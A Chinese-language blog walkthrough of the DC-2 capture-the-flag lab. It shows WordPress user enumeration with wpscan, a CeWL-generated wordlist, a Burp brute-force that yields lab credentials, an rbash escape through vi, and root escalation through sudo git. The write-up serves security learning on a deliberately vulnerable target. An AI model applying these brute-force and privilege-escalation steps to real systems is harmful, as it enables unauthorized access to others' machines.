靶场搭建
下载:DC-2
下载后解压,导入虚拟机
和dc-1一样,两眼一黑,啥也不知道
用攻击机扫一下同段,找到了靶机地址67.131
扫一下全端口,一个http服务,一个ssh
访问80端口访问不了。。而且ip被转化成了域名去访问,是不是dns解析不了
在host文件中添加指向
C:\Windows\System32\drivers\etc
添加下面这一行,让域名dc-2自动解析到67.131
ok,这下成功访问到了,是一个wordpress的cms ,版本4.7.10
看到了flag1
文盲必备翻译器
关键词 cewl,password
“登录去查看下一个flag”,这意思就是爆破密码呗
拿wpscan扫描一下
wpscan --url http://dc-2/ --enumerate
找到了三个用户名:
admin
jerry
tom
用cewl生成一下密码字典
CeWL是一款用于创建自定义字典文件的工具,可以从指定的网站或文本文件中提取出关键字,并组合成自定义字典文件。
cewl http://dc-2/ -w password.txt
生成的字典如下:
┌──(root㉿zss)-[/home/zss]
└─# cat password.txt
sit
amet
nec
quis
vel
orci
site
non
sed
vitae
luctus
sem
Sed
leo
ante
content
nisi
Donec
turpis
Aenean
wrap
tincidunt
finibus
dictum
egestas
volutpat
justo
odio
eget
Vestibulum
ipsum
neque
erat
vestibulum
interdum
quam
sodales
nulla
suscipit
arcu
urna
dui
faucibus
sapien
blandit
nibh
tellus
auctor
nisl
sagittis
Suspendisse
laoreet
fermentum
Our
metus
eros
cursus
dignissim
Pellentesque
tortor
lacus
consectetur
convallis
velit
malesuada
Proin
rhoncus
mauris
placerat
commodo
enim
dolor
augue
purus
maximus
posuere
iaculis
molestie
WordPress
Integer
felis
lobortis
condimentum
Nullam
risus
nunc
porttitor
lacinia
imperdiet
porta
viverra
Curabitur
hendrerit
dapibus
diam
branding
header
navigation
entry
aliquam
ullamcorper
Nam
varius
feugiat
ultrices
ligula
scelerisque
congue
gravida
Feed
Mauris
vulputate
semper
elit
tristique
Maecenas
lorem
sollicitudin
Cras
bibendum
Praesent
libero
vehicula
euismod
ultricies
ornare
lectus
Flag
rutrum
fringilla
Morbi
Aliquam
Quisque
primis
magna
pulvinar
Phasellus
tempus
eleifend
elementum
another
What
People
Products
est
accumsan
venenatis
Etiam
pharetra
Fusce
efficitur
Just
Welcome
Nunc
massa
pellentesque
Duis
Nulla
cubilia
Curae
Vivamus
fames
facilisis
consequat
Skip
text
custom
Menu
top
masthead
pretium
potenti
post
main
primary
Proudly
powered
info
colophon
contain
page
Comments
RSD
mollis
mattis
habitant
morbi
senectus
netus
aliquet
tempor
you
Interdum
just
can
Scroll
down
Lorem
adipiscing
panel
facilisi
Orci
natoque
penatibus
magnis
dis
parturient
montes
nascetur
ridiculus
mus
Your
usual
wordlists
probably
won
work
instead
maybe
need
cewl
More
passwords
always
better
but
sometimes
win
them
all
Log
one
see
the
next
flag
find
log
okok,现在账号,密码字典有了,就开始爆破呗
emm爆哪里 是不是还缺一个登陆页面…
dirsearch上
dirsearch -u http://dc-2/
看看都是啥东西
WordPress 站点目录结构下有三大根文件夹,分别是 wp-admin, wp-includes,wp-content。其中,
wp-admin 文件夹包含控制 WordPress 后台仪表盘的管理文件。wp-admin 基本上包含了 WordPress安装的所有配置文件,此外,wp-admin 还具有其他的一些功能,例如加载仪表盘,建立与数据库的连接等。wp-admin 文件夹的核心是 admin.php 文件,负责执行例如验证任何给定用户是否真的是管理员等的关键功能。
wp-includes 文件夹负责 WordPress网站的外观,基本上包含了使网站正常运行所需的所有文件,例如证书,字体,JS,主题兼容以及小部件等其他网站核心功能。wp-includes文件夹的核心是 functions.php 文件,它包含使 WordPress 网站能够运行并充分发挥作用的所有功能。
wp-content 文件夹是存储主题,插件,主题升级和上传到网站所有内容(例如图片,视频,音频,PDF文档等等其他文件)的地方,wp-content 文件夹下通常有三个子文件夹,分别是 plugins ,themes 以及 uploads。
找到后台登陆页面
http://dc-2/wp-admin/
抓包拿到bp里爆破一下
找到两个响应长度明显不一样的
tom/parturient
jerry/adipiscing
登进来了
jerry账号看到了flag2
.。。。。这是啥提示
思路好像是断了,但是突然想起来开头扫描的端口,还有个7744ssh没搞,试试登陆一下
tom成功登录,jerry不行
当前目录有一个flag3,但是读不了
去查了一下rbash是啥
rbash是Restricted bash缩写,即受限制的bash。 管理员可通过指定普通用户的bash为rbash,以此来限制相关操作。
在rbash中,很多行为和命令都会被受到限制。
查看环境变量
当前可以执行的命令
用vi读一下flag3
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
提示提权
学习了一下rbash绕过
使用vi绕过
然后再回车输入
:shell
就返回了一个无限制的shell
切换到jerry目录下,读到了flag4
提示git
切换jerry登录,看了看有些命令还是不行
需要给tom添加环境变量
export PATH=PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
sudo -l查看可以执行的命令,jerry可以执行git命令
使用git提权
git提权的两种方式
1、sudo git help config #在末行命令模式输入 !/bin/bash 或 !‘sh’ #完成提权
2、sudo git -p help !/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell
最后读到final-flag
这关做的云里雾里的
总结一下
- host文件添加域名指向
windows路径:C:\Windows\System32\drivers\etc
linux路径:/etc/hosts - rbash受限制的bash绕过 ————受限的bash绕过
- 环境变量PATH:决定了系统在哪些目录中查找可执行文件。当你输入一个命令时,系统会在PATH中定义的目录中查找该命令的可执行文件————环境变量详解
- git提权————suid提权+git提权
扫一扫
1300
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
